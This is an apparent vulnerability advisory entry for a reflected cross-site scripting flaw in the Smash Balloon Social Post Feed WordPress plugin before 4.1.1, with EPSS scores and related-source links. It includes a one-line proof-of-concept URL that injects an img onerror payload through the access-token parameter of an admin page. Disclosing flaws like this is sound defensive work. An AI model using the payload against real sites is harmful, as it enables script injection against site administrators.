Lucene search

K

Krzysztof ZającWPVDB-ID:AE1AAB4E-B00A-458B-A176-85761655BDCC

HistoryDec 16, 2021 - 12:00 a.m.

Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting (XSS)

2021-12-1600:00:00

Krzysztof Zając

wpscan.com

4

smash balloon social

cross-site scripting

authenticated

reflected

custom facebook feed

EPSS

0.001

Percentile

30.1%

The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.

PoC

http://127.0.0.1:8001/wp-admin/admin.php?page=cff-top&cff;_access_token=xox<%2Fscript><img+src+onerror%3Dalert(1)>&cff;_final_response=true

EPSS

0.001

Percentile

30.1%

Related for WPVDB-ID:AE1AAB4E-B00A-458B-A176-85761655BDCC

patchstack1 nvd1 prion1 openvas1 cvelist1 nuclei1 cve1 wpexploit1